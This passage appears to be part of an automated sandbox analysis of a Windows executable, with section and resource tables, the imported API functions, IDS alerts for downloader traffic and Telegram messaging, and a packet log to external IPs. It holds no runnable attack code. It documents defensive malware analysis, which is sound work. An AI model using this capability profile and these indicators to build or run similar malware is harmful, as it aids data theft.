                                                                                                  .rsrc0xd40000x388e40x38a00ebd35cb479881ea53e15418b002b1bc2False0.8979804773730684data7.827364837668468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x10d0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xd43e00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                  RT_ICON0xd45080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.19060283687943264
                                                                                                  RT_ICON0xd49700x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishGreat Britain0.11429872495446267
                                                                                                  RT_ICON0xd5a980x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishGreat Britain0.07211147274206672
                                                                                                  RT_ICON0xd81000x1952PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.7099660598580685
                                                                                                  RT_STRING0xd9a540x594dataEnglishGreat Britain0.3333333333333333
                                                                                                  RT_STRING0xd9fe80x68adataEnglishGreat Britain0.2735961768219833
                                                                                                  RT_STRING0xda6740x490dataEnglishGreat Britain0.3715753424657534
                                                                                                  RT_STRING0xdab040x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                  RT_STRING0xdb1000x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                  RT_STRING0xdb75c0x466dataEnglishGreat Britain0.3605683836589698
                                                                                                  RT_STRING0xdbbc40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                  RT_RCDATA0xdbd1c0x306a5data1.0003580271192936
                                                                                                  RT_GROUP_ICON0x10c3c40x3edataEnglishGreat Britain0.8548387096774194
                                                                                                  RT_GROUP_ICON0x10c4040x14dataEnglishGreat Britain1.15
                                                                                                  RT_VERSION0x10c4180xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                  RT_MANIFEST0x10c4f40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                  DLLImport
                                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                  UxTheme.dllIsThemeActive
                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishGreat Britain
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-08T15:44:05.738136+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:06.722541+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:07.334959+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:08.066253+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:08.719105+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549708188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:10.024728+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:15.290825+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549718188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:17.531327+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549726149.154.167.220443TCP
                                                                                                  2025-01-08T15:44:22.284959+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549754132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:23.456846+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549754132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:24.025560+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549766188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:24.753710+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549772132.226.247.7380TCP
                                                                                                  2025-01-08T15:44:29.389726+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549810188.114.96.3443TCP
                                                                                                  2025-01-08T15:44:34.287910+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549844149.154.167.220443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 8, 2025 15:44:04.765481949 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:04.770286083 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:04.770380020 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:04.770581961 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:04.775333881 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.471961975 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.476053953 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:05.485153913 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.693861008 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.738136053 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:05.754703045 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:05.754745960 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.754811049 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:05.761123896 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:05.761140108 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.239515066 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.239603043 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.246465921 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.246490002 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.246864080 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.300599098 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.315809011 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.363333941 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.440931082 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.440998077 CET44349705188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.441052914 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.447468996 CET49705443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.450648069 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:06.455471039 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.668267965 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.670399904 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.670434952 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.670492887 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.670775890 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:06.670785904 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:06.722541094 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.150996923 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.153856039 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:07.153883934 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.334969044 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.335038900 CET44349706188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.335120916 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:07.335602999 CET49706443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:07.338872910 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.340197086 CET4970780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.343853951 CET8049704132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.343924046 CET4970480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.344984055 CET8049707132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:07.345077038 CET4970780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.345136881 CET4970780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:07.349910021 CET8049707132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.017226934 CET8049707132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.018481016 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.018516064 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.018574953 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.018822908 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.018832922 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.066252947 CET4970780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:08.555248976 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.556811094 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.556833982 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.719118118 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.719182968 CET44349708188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.719230890 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.725769043 CET49708443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:08.735691071 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:08.740514040 CET8049709132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:08.740601063 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:08.791681051 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:08.796582937 CET8049709132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:09.412719965 CET8049709132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:09.414350986 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:09.414398909 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:09.414454937 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:09.414696932 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:09.414715052 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:09.456845045 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:09.872608900 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:09.874330044 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:09.874349117 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.024751902 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.024825096 CET44349710188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.024899960 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:10.025369883 CET49710443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:10.028876066 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:10.029479027 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:10.033891916 CET8049709132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.034262896 CET8049711132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.034316063 CET4970980192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:10.034347057 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:10.034434080 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:10.039201021 CET8049711132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.725920916 CET8049711132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.727338076 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:10.727402925 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.727480888 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:10.727749109 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:10.727762938 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:10.769522905 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.211147070 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.213092089 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:11.213135958 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.372924089 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.372987986 CET44349712188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.373162985 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:11.373524904 CET49712443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:11.376914024 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.377528906 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.381931067 CET8049711132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.382023096 CET4971180192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.382301092 CET8049713132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:11.382358074 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.382435083 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:11.387384892 CET8049713132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.051609039 CET8049713132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.052836895 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.052898884 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.052973986 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.053221941 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.053234100 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.097482920 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.544647932 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.546241045 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.546277046 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.677844048 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.677913904 CET44349714188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.677978992 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.678359032 CET49714443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:12.681646109 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.682854891 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.686718941 CET8049713132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.686789036 CET4971380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.687732935 CET8049715132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:12.687804937 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.687886953 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:12.692677021 CET8049715132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.367024899 CET8049715132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.372294903 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.372317076 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.372380018 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.372647047 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.372658968 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.425611973 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.829510927 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.831552982 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.831589937 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.959301949 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.959366083 CET44349716188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.959429026 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.959884882 CET49716443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:13.962959051 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.964056015 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.967962027 CET8049715132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.968040943 CET4971580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.968882084 CET8049717132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:13.968971014 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.969070911 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:13.973843098 CET8049717132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:14.652435064 CET8049717132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:14.653783083 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:14.653819084 CET44349718188.114.96.3192.168.2.5
